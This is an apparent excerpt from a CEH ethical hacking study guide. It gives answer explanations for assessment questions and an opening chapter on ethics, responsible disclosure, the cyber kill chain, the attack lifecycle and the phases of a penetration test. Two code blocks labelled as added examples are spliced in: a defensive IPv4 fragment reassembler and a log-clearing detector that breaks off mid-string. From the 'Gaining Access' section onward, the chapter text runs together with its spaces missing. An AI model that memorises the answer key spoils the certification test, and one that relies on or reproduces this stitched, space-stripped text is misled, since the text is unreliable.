2. C. A SQL injection attack makes use of SQL queries, which can include logic that may alter the flow of the application. In the example provided, the intent is to force the result of the SQL query to always return a true. It is quoted the way it is to escape the existing query already in place in the application. None of the other attacks uses a syntax that looks like the example.

3. C. The Apple App Store and the Google Play Store are controlled by Apple and Google. It's not impossible to get malware onto mobile devices that way, but it's very difficult because apps get run through a vetting process. While some Android devices will support external storage, it's not an effective way to get malware onto a smartphone or other mobile device. Jailbreaking can lead to malware being installed, but it's not the means to get malware onto a mobile device. Third-party app stores can be a good means to get malware onto mobile devices because some third-party app stores don't vet apps that are submitted.

4. B. DHCP is used to get IP configuration to endpoints. DNS is used to resolve a hostname to an IP address and vice versa. RARP is the reverse address protocol used to take a MAC address and resolve it to an IP address. ARP is used to resolve an IP address to a MAC address. Communication on a local network requires the use of a MAC address. The IP address is used to get to systems off the local network.

5. C. Heap spraying uses dynamically allocated space to store attack code. A slowloris attack is used to hold open web server connection buffers. A SQL injection will be used to inject SQL queries to the database server. A buffer overflow sends more data into the application than space has been allocated for.

6. B. A /23 network would be 255.255.254.0. A /22 would be 255.255.252.0. A /20 would be 255.255.240.0. Only a /21 would give you a 255.255.248.0 subnet mask.

7. C. Both worms and viruses could be written to use polymorphic code, which means they could modify what they look like as they propagate. A worm, though, could self-propagate. It's the one distinction between worms and viruses. Viruses require some intervention on the part of the user to propagate and execute.

8. A. Risk is the probability of the occurrence of an event multiplied by the dollar value of loss. There is no mitigation factor that is quantified, so it could be put into a risk calculation.

9. B. An evil twin attack uses an access point masquerading to be the point of connection for stations trying to connect to a legitimate wireless network. Stations reach out to make connections to this access point masquerading as another access point. While you may phish for credentials as part of an evil twin attack, credential phishing is not how evil twin attacks work. SSIDs don't get changed as part of an evil twin attack, meaning no SSID that exists will become another SSID. Injecting four-way handshakes won't do much, since four-way assumes both ends are communicating, so the injection of a full communication stream will get ignored.

10. C. Antivirus solutions are used on endpoints or maybe on email servers. Stateful firewalls add the ability to factor in the state of the connection—new, related, established. An Application layer gateway knows about Application layer protocols. A unified threat management appliance adds capabilities on top of firewall functions, including antivirus.

11. A. Standards and practices should be derived from a security policy, which is the high-level guidance on the role of security within an organization. Security does not generally increase the bottom line of a company. Policies are not for providing specific directions, which would be the role of procedures.

12. B. Base64 encoding takes nonprintable characters and encodes them in a way that they can be rendered in text. Encryption would generally render text unreadable to people. A cryptographic hash is a way of generating a fixed-length value to identify a value. URL encoding takes text and uses hexadecimal values to represent the characters. This is text that has been converted into hexadecimal so it can be used in a URL.

13. B. Mail exchanger records would be identified as MX records. A name server record is identified with the tag ns. While an enterprise may have one or even several caching name servers, the caching name server wouldn't be said to belong to the domain since it doesn't have any domain identification associated with it.

14. C. A DNS query can be used to identify an IP address from a hostname, or vice versa. You could potentially use a brute-force technique to identify hostnames, though you may not get everything using that method. A recursive request is common from a caching server to get an authoritative response. The term for getting all the contents of the zone is a zone transfer.

15. A. Tunneling attacks can be used to hide one protocol inside another. This may be used to send operating system commands using a tunnel system. A DNS amplification attack is where a small DNS request results in much larger responses sent to the target. DNS recursion is used to look up information from DNS servers. An XML entity injection attack is a web-based attack and wouldn't be found inside a DNS request.

16. D. There may be several reasons for performing a ping sweep. You likely want to identify responsive hosts on the network segment you are targeting. You may not, though, want to use a full port scan. ICMP is a lightweight protocol, and there is a chance it will be allowed through the firewall, since it's used for troubleshooting and diagnostics.

17. C. The NIST cybersecurity framework specifies five functions—identify, protect, detect, respond, recover.

18. B. Python interpreters may be considered to be slower to execute than a compiled program; however, the difference is negligible, and generally speed of execution isn't much of a concern when it comes to malware. Python is not a hard language to learn, and there are a lot of community-developed libraries. One challenge, though, is that you may need a Python interpreter, unless you go through the step of getting a Python compiler and compiling your script. Windows systems wouldn't commonly have a Python interpreter installed.
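Answer 1 above says the IP identification field is what ties fragments of one datagram together. The following is an added example, not code from the book: it builds a few constructed IPv4 fragments (sample addresses 10.0.0.1 and 10.0.0.2, identification values 0x1234 and 0x9999, header checksum left at zero), reassembles them only when they share the same (source, destination, protocol, identification) key, and rejects overlapping fragments whose bytes disagree, which is the case a reassembling firewall or IDS has to handle rather than silently merge.

```python
import struct
from collections import defaultdict

IP_HEADER = "!BBHHHBBH4s4s"   # IPv4 header without options (20 bytes)
IP_MF = 0x2000                 # More Fragments flag
IP_OFFSET_MASK = 0x1FFF        # fragment offset, in 8-byte units


def build_fragment(src, dst, ident, proto, offset, more, payload):
    """Construct one IPv4 fragment (sample data; checksum left as 0)."""
    assert offset % 8 == 0, "fragment offsets are multiples of 8 bytes"
    flags_frag = (IP_MF if more else 0) | (offset // 8)
    header = struct.pack(IP_HEADER, 0x45, 0, 20 + len(payload), ident,
                         flags_frag, 64, proto, 0, src, dst)
    return header + payload


def parse_fragment(packet):
    """Pull the fields reassembly needs out of an IPv4 packet."""
    (ver_ihl, _tos, total_len, ident, flags_frag,
     _ttl, proto, _csum, src, dst) = struct.unpack(IP_HEADER, packet[:20])
    ihl = (ver_ihl & 0x0F) * 4
    return {
        "key": (src, dst, proto, ident),        # identification is part of the key
        "offset": (flags_frag & IP_OFFSET_MASK) * 8,
        "more": bool(flags_frag & IP_MF),
        "payload": packet[ihl:total_len],
    }


class Reassembler:
    """Reassemble fragments keyed on (src, dst, proto, IP identification)."""

    def __init__(self):
        self._pending = defaultdict(lambda: {"frags": {}, "total": None})

    def feed(self, packet):
        """Accept one fragment; return the full payload once complete, else None."""
        frag = parse_fragment(packet)
        entry = self._pending[frag["key"]]
        start, data = frag["offset"], frag["payload"]
        end = start + len(data)
        # Overlapping fragments that carry different bytes are a known
        # evasion pattern: refuse them instead of guessing which copy wins.
        for o, d in entry["frags"].items():
            lo, hi = max(start, o), min(end, o + len(d))
            if lo < hi and data[lo - start:hi - start] != d[lo - o:hi - o]:
                raise ValueError("conflicting overlap at offset %d" % lo)
        entry["frags"][start] = data
        if not frag["more"]:            # MF clear: this fragment fixes the total length
            entry["total"] = end
        if entry["total"] is None:
            return None
        # Require contiguous coverage from byte 0 up to the final fragment's end
        covered = 0
        for o in sorted(entry["frags"]):
            if o > covered:
                return None             # gap: still waiting for a fragment
            covered = max(covered, o + len(entry["frags"][o]))
        if covered < entry["total"]:
            return None
        assembled = bytearray(entry["total"])
        for o, d in entry["frags"].items():
            assembled[o:o + len(d)] = d
        del self._pending[frag["key"]]
        return bytes(assembled)


def demo():
    """Three fragments of one datagram arrive out of order; a stray fragment
    with a different identification value must not be mixed into them."""
    src, dst = bytes([10, 0, 0, 1]), bytes([10, 0, 0, 2])
    original = bytes(range(24))                      # constructed 24-byte payload
    frags = [
        build_fragment(src, dst, 0x1234, 17, 16, False, original[16:]),
        build_fragment(src, dst, 0x1234, 17, 0, True, original[:8]),
        build_fragment(src, dst, 0x1234, 17, 8, True, original[8:16]),
    ]
    stray = build_fragment(src, dst, 0x9999, 17, 0, True, b"\xff" * 8)
    r = Reassembler()
    results = [r.feed(p) for p in (stray, frags[0], frags[1], frags[2])]
    return original, results


if __name__ == "__main__":
    original, results = demo()
    print("reassembled correctly:", results[-1] == original)
```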
19. B. The expression host 192.168.10.5 is BPF indicating that tcpdump should only capture packets to and from 192.168.10.5. If you wanted to only get it to or from, you would need to modify host with src or dest.

20. C. Certificates can be revoked, but that's not what Diffie-Hellman is used for. Key management is a much broader topic than what Diffie-Hellman is used for. Diffie-Hellman is used for key exchange. It is a process that allows parties to an encrypted conversation to mutually derive the same key starting with the same base value.

21. D. While you might be imitating someone, imitation is not a social engineering principle. Neither social proof nor scarcity is at play in this situation. However, if you are calling from the help desk, you may be considered to be in a position of authority.

22. D. SNMPv3 implemented username and password authentication. With version 1, you used a cleartext community string. SNMP doesn't use hashes, and while the word public is often used as a community string, a public string is not a way to authenticate with SNMPv1.

23. A. Interprocess communications across systems using a network is called remote method invocation. The process that programs have to communicate with to get a dynamic port allocation is the RMI registry. This is the program you query to identify services that are available on a system that has implemented RMI.

24. C. When an ARP response is sent without a corresponding ARP request, it's an unexpected or unnecessary message, so it is a gratuitous ARP.

25. D. There are three date and time stamps commonly used in file metadata. When the file is created, that moment is stored. When a file is accessed by a user, that moment is stored. When a file is modified, that moment is stored. Accessed is not the same as modified since accessing a file could be read-only. You could open a file, expecting to modify it but not ending up doing the modification. The access time still changes. While moves, adds, and changes may sometimes be referred to as MAC like modified, accessed, and created, those are not tasks associated with file times.

26. C. Local vulnerabilities are used against applications that are not listening on the network. This means they require you to be "local" to the machine and not remote. In other words, you have to be logged in somehow. A local vulnerability would not be used to collect passwords since you don't need a vulnerability to do that. Similarly, you don't need to make use of a vulnerability to manipulate logs or to pivot. Most of those would require you to have elevated permissions, though. A local vulnerability may be exploited to get you those elevated permissions.

27. A. Integrity is part of the CIA triad but isn't the principle that ties a signed message back to the subject of the signing certificate. Nonverifiability is nonsense, and authority isn't relevant here. Instead, nonrepudiation means someone can't say they didn't send a message if it was signed with their key and that key was in their possession and password-protected.

28. D. Biometrics and badge access are forms of physical access control. Phone verification could possibly be used as a way of verifying identity, but it won't protect against tailgating. A mantrap, however, will protect against tailgating because a mantrap allows only one person in at a time.

29. B. Bluesnarfing is an attack that connects to a Bluetooth device to grab data from that device. Bluejacking can be used to send information to a Bluetooth device that is receiving from the attacker, such as a text message. Neither of these attacks installs keyloggers. The victim device sends information to the attacker in a bluesnarfing attack.

30. B. The Biba security model covers data integrity. While other models cover confidentiality, none of them covers availability.

Chapter 1 Ethical Hacking

THE FOLLOWING CEH EXAM TOPICS ARE COVERED IN THIS CHAPTER:
✓ Professional code of conduct
✓ Appropriateness of hacking

Welcome to the exciting world of information security and, specifically, the important world of what is referred to as ethical hacking. You're here because you want to take the exam that will get you the Certified Ethical Hacker (CEH) certification. Perhaps you have done the training from EC-Council, the organization that manages the CEH, and you want a resource with a different perspective to help you as you prepare for the exam. Or you've decided to go the self-study route and you have enough experience to qualify for the exam. One way or another, you're here now, and this book will help you improve your understanding of the material to prepare for the exam.

The exam covers a wide range of topics, often at a deeply technical level, so you really need to have a solid understanding of the material. This is especially true if you choose to go on to the practical exam. This chapter, however, will be your starting point, and there is nothing technical here. In it, you'll get a chance to understand the foundations of the entire exam. First, you'll learn just what ethical hacking is, as well as what it isn't. The important part of the term ethical hacking is the ethical part. When you take the exam, you will be expected to abide by a code. It's essential to understand that code so you can live by it throughout your entire career.

Finally, you'll learn what EC-Council is, as well as the format and other details of the exam that will be useful to you. While some of it may seem trivial, it can be helpful to get a broader context for why the exam was created and learn about the organization that runs it. Personally, I find it useful to understand what's underneath something rather than experience it at a superficial level. As a result, you'll get the macro explanation, and you can choose to use it or not, depending on whether you find it helpful. It won't be part of the exam, but it may help you understand what's behind the exam so you understand the overall intentions.

Overview of Ethics

Before we start talking about ethical hacking, I will cover the most important aspect of that, which is ethics. You'll notice it's not referred to as "hacking ethically." It's ethical hacking. The important part is in the front. Ethics can be a challenging subject because you will find that it is not universal. Different people have different views of what is ethical and what is not ethical. It's essential, though, that you understand what ethics are and what is considered ethical and unethical from the perspective of the Certified Ethical Hacker certification. This is a critical part of the exam and the certification. After all, you are being entrusted with access to sensitive information and critical systems. To keep yourself viable as a professional,
you need to behave and perform your work in an ethical manner. Not only will you be expected to behave ethically, you will be expected to adhere to a code of ethics.

As part of the code of ethics, you will be sworn to keep information you obtain as part of your work private, paying particular attention to protecting the information and intellectual property of employers and clients. When you are attacking systems that belong to other people, you could be provided with internal information that is sensitive. You could also come across some critical information vital to the organization for which you are working. Failing to protect any of that data violates the code of ethics by compromising the confidentiality of that information.

You are expected to disclose information that needs to be disclosed to the people who have engaged your services. This includes any issues that you have identified. You are also expected to disclose potential conflicts of interest that you may have. It's important to be transparent in your dealings and also do the right thing when it comes to protecting your clients, employers, and their business interests. Additionally, if you come across something that could have an impact on a large number of people across the Internet, you are expected to disclose it in a responsible manner. This doesn't mean disclosing it in a public forum. It means working with your employer, any vendor that may be involved, and any computer emergency response team (CERT) that may have jurisdiction over your findings.

Responsible disclosure was first identified and documented in the 1990s, well over 20 years ago. The security researcher Rain Forest Puppy developed a full disclosure policy, sometimes called the Rain Forest Puppy Policy (RFP or RFPolicy). It advocated working closely with vendors to ensure they had time to fix issues before announcing them. At the time, there was a tendency for so-called researchers to just publish findings to the public to make a name for themselves without regard to the possibility of exposing innocent people when the vulnerabilities they found were exploited by attackers. On the other side, companies that developed software hadn't caught up with the idea that they needed to be on top of vulnerabilities, and the slow months- or years-long pace of software development wasn't possible any longer with word of vulnerabilities getting out within minutes around the world. Hackers may have tried to notify a company only to have that company ignore the contact. Other companies may have acknowledged the bug but then dragged their feet about getting fixes out to their customers. The RFPolicy was an attempt to ensure that those who found vulnerabilities didn't just announce them indiscriminately but also had the ability to make the announcement if the company started to drag their feet. Wide acceptance of this policy within the security community dramatically increased the collaboration between those who were looking for vulnerabilities and those companies who had to be conscious of their consumers who may be exposed to attack if vulnerabilities were announced.

For examples of responsible disclosure, look at the work of Dan Kaminsky. He has found serious flaws in the implementations of the Domain Name System (DNS), which impacts everyone on the Internet. He worked responsibly with vendors to ensure that they had time to fix their implementations and remediate the vulnerabilities before he disclosed them. In the end, he did disclose the vulnerabilities in a very public manner, but only after vendors had time to fix the issue. This meant he wasn't putting people in the path of compromise and potential information disclosure. Even though he was using the software in a way that it wasn't intended to be used, he was using an ethical approach by attempting to address an issue before someone could make use of the issue in a malicious way.

As you perform work, you will be given access to resources provided by the client or company. Under the code of ethics you will need to agree to, you cannot misuse any of the equipment. You can't damage anything you have access to as part of your employment or contract. There will be times when the testing you are performing may cause damage to a service provided by the infrastructure of the company you are working for or with. As long as this is unintentional or agreed to be acceptable by the company, this is okay. One way to alleviate this concern is to keep lines of communication open at all times. If it happens that an unexpected outage occurs, ensuring that the right people know so it can be remedied is essential.

Perhaps it goes without saying, but you are not allowed to engage in any illegal actions. Similarly, you cannot have been convicted of any felony. Along the same lines, though it's not directly illegal, you can't be involved with any group that may be considered "black hat," meaning they are engaged in potentially illegal activities, such as attacking computer systems for malicious purposes.

Colorful Terminology

You may regularly hear the terms white hat, black hat, and gray hat. White-hat hackers are people who always do their work for good. Black-hat hackers, probably not surprisingly, are people who do bad things, generally actions that are against the law. Gray-hat hackers, though, fall in the middle. They are working for good, but they are using the techniques of black-hat hackers.

Communication is also important when you embark on an engagement, regardless of whether you are working on contract or are a full-time employee. When you are taking on a new engagement, it's essential to be clear about the expectations for your services. If you have the scope of your services in writing, everything is clear and documented. As long as what you are being asked to do is not illegal and the scope of activities falls within systems run by the company you are working for, your work would be considered ethical. If you stray outside of the scope of systems, networks, and services, your actions would be considered unethical. When you keep your interactions professional and ensure that it's completely clear to your employer what you are doing, as long as your actions are against systems belonging to your employer, you should be on safe ground ethically.

Overview of Ethical Hacking

These days, it's hard to look at any source of news without seeing something about data theft, Internet-based crime, or various other attacks against people and businesses. What we see in the news, actually, are the big issues, with large numbers of records compromised or big companies breached. What you don't see is the number of system compromises where the target of the attack is someone's personal computer or other device. Consider, for example, the Mirai botnet, which infected smaller, special-purpose devices running an
embedded implementation of Linux. The number of devices thought to have been compromised and made part of that botnet is well over 100,000, with the possibility of there being more than one million.

Each year, millions of new pieces of malware are created, often making use of new vulnerabilities that have been discovered. Since 2005, there has not been a year without at least 10 million data records compromised. In the year 2017, nearly 200 million records were compromised. These numbers are just from the United States. To put this into perspective, there are only about 250 million adults in the United States, so it's safe to say that every adult has had their information compromised numerous times. To be clear, the data records that we're talking about belong to individual people and not to businesses. There is minimal accounting of the total value of intellectual property that may have been stolen, but it's clear that the compromise has been ongoing for a long time.

All of this is to say there is an urgent need to improve how information security is handled. It's believed that to protect against attacks, you have to be able to understand those attacks. Ideally, you need to replicate the attacks. If businesses are testing attacks against their own infrastructure early and often, those businesses could be in a better position to improve their defenses and keep the real attackers out. This type of testing is what ethical hacking really is. It is all about ferreting out problems with a goal of improving the overall security posture of the target.

This may be for a company in terms of their infrastructure or even desktop systems. It may also be performing testing against software to identify bugs that can be used to compromise the software and, subsequently, the system where the software is running. The aim is not to be malicious but to be on the "good" side to make the situation better. This is something you could be hired or contracted to perform for a business. They may have a set of systems or web applications they want tested. You could also have software that needs to be tested. There are a lot of people who perform testing on software—both commercial and open source.

Ethical hacking can be done under many different names. You may not always see the term ethical hacking, especially when you are looking at job titles. Instead, you will see the term penetration testing. It's essentially the same thing. The idea of a penetration test is to attempt to penetrate the defenses of an organization. That may also be the goal of an ethical hacker. You may also see the term red teaming, which is generally considered a specific type of penetration test where the testers are adversarial to the organization and network under test. A red teamer would actually act like an attacker, meaning they would try to be stealthy so as not to be detected. One of the challenging aspects of this sort of activity is having to think like an attacker. Testing of this nature is often challenging and requires a different way of thinking.

When doing any sort of testing, including ethical hacking, a methodology is important, as it helps ensure that your actions are both repeatable and verifiable. There are a number of methodologies you may come across. Professionals who have been doing this type of work for a while may have developed their own style. However, they will often follow common steps, such as the ones I am going to illustrate as we move through the chapter.

EC-Council helps to ensure that this work is done ethically by requiring anyone who has obtained the Certified Ethical Hacker certification to agree to a code of conduct. This code of conduct holds those who have their CEH certification to a set of standards ensuring that they behave ethically, in service to their employers. They are expected to not do harm and to work toward improving the security posture rather than doing damage to that posture.

Methodologies

As with so many things, using a methodology is valuable when it comes to ethical hacking or security testing. Methodologies can help with consistency, repeatability, and process improvement. Consistency is important because you want to run the same sets of tests or probes no matter who you are testing against. Let's say you are working with a company that keeps asking you back. Without consistency, you may miss some findings from one test to another, which may let them think they got better, or the finding doesn't exist any longer. This would be a bad impression to leave a company with. Similarly, repeatability gives you the ability to do the same tests every time you run the assessment. In fact, if you are working with a team, every one of you should be able to run the sets of tests. Again, you want to be sure that any organization you are assessing will have the same perspective on their security posture, no matter how many times they come to you and no matter who the organization is.

There are some testing or assessment methodologies that get used throughout the industry. They are typically built around expectations of what an attacker would do. While this may or may not be realistic, there are some other ways of viewing how attackers operate that are useful to understand. The first is the cyber kill chain, and the other is the attacker lifecycle. When we get to look at the methodology of ethical hacking, you will see the similarities.

Cyber Kill Chain

A commonly referred-to framework in the information security space is the cyber kill chain. A kill chain is a military concept of the structure of an attack. The idea of a kill chain is that you can identify where the attacker is in their process so you can adapt your own response tactics. Lockheed Martin, a defense contractor, adapted the military concept of a kill chain to the information security (or cybersecurity) space. Figure 1.1 shows the cyber kill chain, as developed by Lockheed Martin.

FIGURE 1.1 Cyber kill chain

Phases of the Intrusion Kill Chain (as shown in the figure):
Reconnaissance: Research, identification, and selection of targets.
Weaponization: Pairing remote access malware with exploit into a deliverable payload (e.g., Adobe PDF and Microsoft Office files).
Delivery: Transmission of weapon to target (e.g., via email attachments, websites, or USB drives).
Exploitation: Once delivered, the weapon's code is triggered, exploiting vulnerable applications or systems.
Installation: The weapon installs a backdoor on a target's system, allowing persistent access.
Command & Control: Outside server communicates with the weapons providing "hands-on keyboard access" inside the target's network.
Actions on Objective: The attacker works to achieve the objective of the intrusion, which can include exfiltration or destruction of data, or intrusion of another target.

The first stage of the cyber kill chain is reconnaissance. This is where the attacker identifies their target as well as potential points of attack. This may include identifying vulnerabilities that could be exploited. There may be a lot of information about the target gathered in this phase, which will be useful later in the attack process.

Once the attacker has identified a target, they need to determine how to attack the target. This is where weaponization comes in. The attacker may create a custom piece of malware, for instance, that is specific to the target. They may just use a piece of common off-the-shelf (COTS) malware, though this has the potential to be discovered by antivirus software installed in the victim's environment. The attacker may decide this doesn't matter by sending out more malicious software to more individuals.

Delivery is how you get the weapon (the malware or the link to a rogue website) into the victim's environment. This could be a network-based attack, meaning there is an exposed service that may be vulnerable to exploit remotely. This could be sending an attachment in via email, or it could be that the malicious software is hosted on a web server the victim is expected to visit and get infected when they hit the website.

Exploitation is when the malicious software infects the victim's system. Exploitation leads to installation. The attacker will install additional software to maintain access to the system and perhaps give them remote access to the system.

Once installation is complete, the attacker moves to command and control. You will sometimes see this referred to as C2. The command-and-control phase gives attackers remote access to the infected system. This may involve installation of additional software, or it may involve sending directives to the infected system. The attacker may be trying to get information from the infected system or have the system perform actions like participating in a large-scale denial-of-service attack. These actions are called actions on objectives. Each attacker may have different objectives they are trying to achieve. Attackers who are criminally oriented are probably looking for ways to monetize the infected systems by stealing information that could be stolen or by selling off access to another organization. So-called nation-state actors may be looking to gain access to intellectual property. No matter what the organization is, they have objectives they are trying to achieve. They will keep going until they achieve those objectives, so there is a lot of activity that happens in this phase of the kill chain.

Attack Lifecycle

The security technology and consulting company FireEye Mandiant often refers to a different methodology called the attack lifecycle. This is different from the cyber kill chain, though there are some similarities. Rather than a theoretical exercise or one with a military focus, the attack lifecycle describes exactly how attackers have operated for as far back as there have been attacks against computing infrastructure. If you go back and look at how the Chaos Computer Club operated in the 1980s or Kevin Mitnick and his contemporaries operated in the late 1970s into the 1980s and beyond, you can map their actions directly into the attack lifecycle. Figure 1.2 shows how the attack lifecycle looks.

FIGURE 1.2
Attack lifecycle

Stages shown in the figure: Initial Recon, Initial Compromise, Establish Foothold, Escalate Privileges, then a loop of Internal Recon, Move Laterally, and Maintain Presence, and finally Complete Mission.

One significant difference in the attack lifecycle is the recognition that the attack is not one and done. There is a loop that happens in the middle. Attackers don't keep launching attacks from outside the network. Once they get into the environment, they use the compromised systems as launch points for additional compromises within the environment. Attackers will gain access to a system and use that system and anything discovered there, like credentials, to move off to another system in the network.

Before we get there, though, an attacker identifies a victim and potential attack possibilities in the initial recon stage. The attacker is doing reconnaissance, including identifying names and titles using open source intelligence, meaning they use public sources like social network sites, to generate attacks. To gain access, they launch attacks—commonly, these would be phishing attacks. This is the initial compromise stage. Once they have compromised a system, the attacker will work to establish footholds. This includes making sure they retain access to the system so they can get back in when they need to.

It's perhaps important to recognize that these attacks don't happen in a bang-bang fashion. It may take days or weeks to move from one phase of the attack lifecycle to another. This depends on the organization performing the attacks. These are not individuals. They are organizations, so there may be different employees working on different stages.

To do much else, the attacker will need to escalate privileges. They need to have administrative privileges to move into the loop that happens as they continue to move through the environment, gathering additional systems along the way. They will probably be gathering credentials from memory or disk here. They will also be investigating connections the system is known to have had with other systems in the network. This is a form of internal recon. They may also be trying to identify other credentials that are known to the system.

The reconnaissance is necessary to be able to move laterally. This is sometimes known as east-west movement. If you think about the network diagram, the connection to the outside world is quite often on the top. On a map, this would be north, so moving into and out of the network is known as north-south. Any movement within the organization is side to side or lateral movement. On a map, side to side would be east-west. To make those lateral movements, attackers need to know what systems there are. It may be servers, since individual systems are likely to know a lot of servers they communicate with, but it may also be individual workstations. In an enterprise network, it may be possible to authenticate using captured credentials against other workstations, which may have access to different sets of servers.

With every system the attacker gets access to, they need to maintain presence. This means some form of persistence, so any malware that is allowing the attacker access remains running. You might use the Windows registry, scheduled tasks, or other types of persistence to keep any malware running so the attacker can keep getting back in when they want.

The last phase of the attack lifecycle, though leaving it until the end is misleading, is complete mission. Again, attacks tend not to be one and done. Once an attacker is in your environment, they will likely be continuing to revisit to see if there is anything else they need. They may be continuing to get a broader reach within the organization. The complete mission phase is where data may be exfiltrated from the environment. This, again, may not be a one-time thing. The attacker may continue to find additional targets in the environment to exploit, which would likely mean additional exfiltration. This means there would be continuous returns to this phase. After all, if you are planning to take up years-long residence, you don't want to wait years before getting data out because you can't, as an attacker, ever know when something may change and you lose access.

Methodology of Ethical Hacking

The basic methodology is meant to reproduce what real-life attackers would do. You will see similarities here to both the cyber kill chain and the attack lifecycle. Companies can shore up their security postures using information that comes from each stage covered here. One thing to keep in mind when it comes to information security is that not everything is about protection or prevention. You need to be able to detect all of these attacker activities.

Reconnaissance and Footprinting

Reconnaissance is where you gather information about your target. You want to understand the scope of your endeavor up front, of course. This will help you narrow your actions so you aren't engaging in anything that could be unethical. You'll have some sense of who your target is, but you may not have all the details. Gathering the details of your target is one of the reasons for performing reconnaissance. Another reason is that while there is a lot of information that has to be public just because of the nature of the Internet and the need to do business there, you may find information leaked to the rest of the world that the organization you are working for would do better to lock down.

The objective of reconnaissance and footprinting is determining the size and scope of your test. Footprinting is just getting an idea of the "footprint" of the organization, meaning the size and appearance. This means trying to identify network blocks, hosts, locations, and people. The information gathered here will be used later as you progress through additional stages. Keep in mind that while you are looking for details about your target, you will find not only network blocks, which may exist within enterprise networks, but also potentially single hosts, which may belong to systems that are hosted with a service provider. As these systems will run services that may provide entry points or just house sensitive data, it's necessary to keep track of everything you gather and not limit yourself to information available about network blocks that the company may have.

In the process of doing this work, you may also turn up personal information belonging to employees at your target. This will be useful when it comes to social engineering attacks. These sorts of attacks are commonplace. In fact, some estimates suggest that 80 to 90 percent of infiltrations are a result of these social engineering attacks. They are not the only means of accessing networks, but they are commonly the easiest way in.

Scanning and Enumeration

Once you have network blocks identified, you will want to identify systems that are accessible within those network blocks; this is the scanning and enumeration stage. More important, however, you will want to identify services running on any available host. Ultimately, these services will be used as entry points. The objective is to gain access, and that may be possible through exposed network services. This includes not only a list of all open ports, which will be useful information, but also the identity of the service and software running behind each open port.

This may also result in gathering information that different services provide. This includes the software providing the service, such as nginx, Apache, or IIS for a web server. Additionally, there are services that may provide a lot of details about not only the software but the internals of the organization. This may be usernames, for instance. Some Simple Mail Transfer Protocol (SMTP) servers will give up valid usernames if they are queried correctly. Windows servers using the Server Message Block (SMB) protocol or the Common Internet File System (CIFS) protocol can be asked for information. You can get details like the directories being shared, usernames, and even some policy information.

The objective of this phase is to gather as much information as you can to have starting points for when you move into the next phase. This phase can be time-consuming, especially as the size of the network and enterprise you are working with grows. The more details you can gather here, the easier the next stage will be for you.

Gaining Access

Gaining access is what many people consider to be the most important part of a penetration test, and for many, it's the most interesting. This is where you can demonstrate that some services are potentially vulnerable. You do that by exploiting the service. There are no theoretical or false positives when you have compromised a system or stolen data and you can prove it. This highlights one of the important aspects of any ethical hacking: documentation. Just saying, "Hey, I did this" isn't going to be sufficient. You will need to demonst
rateorproveinsomewaythatyoudidmanagetocompromisethesystem.Technicalattacks,likethoselookingforvulnerabilitiesinlisteningnetworkservices,aresometimesthoughtofashowsystemsgetcompromised,buttherealityisthatsocialengineeringattacksarefarmorelikelytobethewayattackersgainaccesstosystems.Thisisoneofthereasonswhyenumerationisimportant—­becauseyouneedtargetsforsocialengineeringattacks.Thereareanumberofwaystoperformsocialengineeringattacks,includingusingemailtoeitherinfectamachinewithmalwareorgettheusertoprovideinformationthatcanbeusedinotherways.Thismaybetheusernameandpassword,forinstance.Anothermechanismforgatheringinformationfromusersistogetthemtovisitawebsite.Thismaybeawebsitethatyou,astheattacker,haveloadedwithmalicioussoftwarethatwillinfecttheirsystems.Or,asbefore,youmaybeaskingthemforinformation.You’veseenmalwarementionedtwicehere.Understandinghowmalwareworksandwhereitcanbeusedcanbeanimportantpartofgainingaccess.12 Chapter1  EthicalHacking■Youwillnotalwaysbeaskedtoperformsocialengineeringattacks.Companiesmaybehandlingsecurityawareness,whichcommonlyincludesawarenessofsocialengineeringattacks,inotherwaysandnotwantorexpectyoutodophishingattacksorweb-­basedattacks.Therefore,youshouldn’trelyonusingthesetechniques,inspiteofthecomparativeeaseofdoingso,togetaccesstosystems.MaintainingAccessOnceyouarein,emulatingcommonattackpatternsmeansthatyoushouldmaintainaccess.Ifyou’vemanagedtocompromiseauser’ssystem,whentheusershutsthesystemdown,youwillloseaccess.Thismaymeanthatyouwillneedtore­compromisethesystem.Sinceexploitsarenotalwaysguaranteedtobeeffective,youmaywellnotgetinthenexttimeyouattemptthecompromise.Beyondthat,youmayhaveusedacompromisethatreliedonavulnerabilitythatwasfixed.Yournextattemptmayfailbecausethevulnerabilityisnolongerthere.Youneedtogiveyourselfothermeanstogetintothesystemsoyoucanmakesureyouretaintheabilitytoseewhatishappeningonthatsystemandpotentiallytheenterprisenetworkoverall.Thisisanotherstagewheremalwarecanbebeneficial.Youmayneedtoinstallarootkit,forexample,that
canprovideyouwithabackdooraswellasthemeanstoobscureyouractionsandexistenceonthesystem.Youmayneedtoinstalladditionalsoftwareonthesystemtomaintainaccess.Thismayrequirecopyingthesoftwareontoyourtargetsystemonceyouhavedonetheinitialcompromise.Therefore,thisstageisn’tassimpleasperhapsitseems.Theremaybeanumberoffactorsthatgetinthewayofensuringthatyoumaintainaccess.Thereare,though,anumberofwaysofmaintainingaccess.Differentoperatingsystemsallowfordifferenttechniques,buteachoperatingsystemversionorupdatecanmakedifferenttechniquesharder.Ethicalhackingisdependentonthecircumstances,whichispartofwhatmakesitchallenging.Therearenosingleanswersorstraightforwardapproaches.OneWindows10systemmaybeeasilycompromisedbecausetherearepatchesthatareavailablebutmissing.AnotherWindows10systemmaybedifficulttogetintobecauseitisup-­to-­date,andithasbeenlockeddownwithpermissionsandothersettings.Maintainingaccessisoftencalledpersistence.Thisiswhereanyaccessmechanismisinstalledtopersistonasystem.Nomatterwhetherauserlogsoutorrebootsasystem,theattackercancontinuetogetin.Thisiscommonlydonebyinstallingsoftwarethatreachesout,orbeacons,tosystemsontheInternetsomewhere.Thereasonforthisisbecauseinboundaccessisoftenblockedbyafirewall.Outboundaccessisoftenallowedfromtheinsideofanetworkinacompletelyunrestrictedmanner.CoveringTracksCoveringyourtracksiswhereyouhideordeleteanyevidencetowhichyoumanagedtogetaccess.Additionally,youshouldcoverupyourcontinuedaccess.Thiscanbeaccomplishedwithmalwarethatensuresthatyouractionsaren’tloggedorperhapsmisreportssysteminformation,likenetworkconnections.Summary 
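As an added defender-side illustration of the covering-tracks stage (example code added here, not from the study guide): a small detector that flags the "log cleared" events that a log wipe on a Windows system leaves behind. The event IDs 1102 (Security log cleared) and 104 (System log cleared) are real Windows values; the JSON-lines export format, the field names and the sample records are constructed assumptions for this example.

```python
"""Flag Windows 'log cleared' events in a log export.

Added example, not from the study guide.  Event IDs 1102 (Security) and 104
(System) are the real Windows event IDs recorded when those logs are cleared;
the JSON-lines layout and field names below are an assumption about how a
SIEM might export them, and the records themselves are constructed."""
import json

# Constructed sample export: one JSON object per line.
SAMPLE_EXPORT = """
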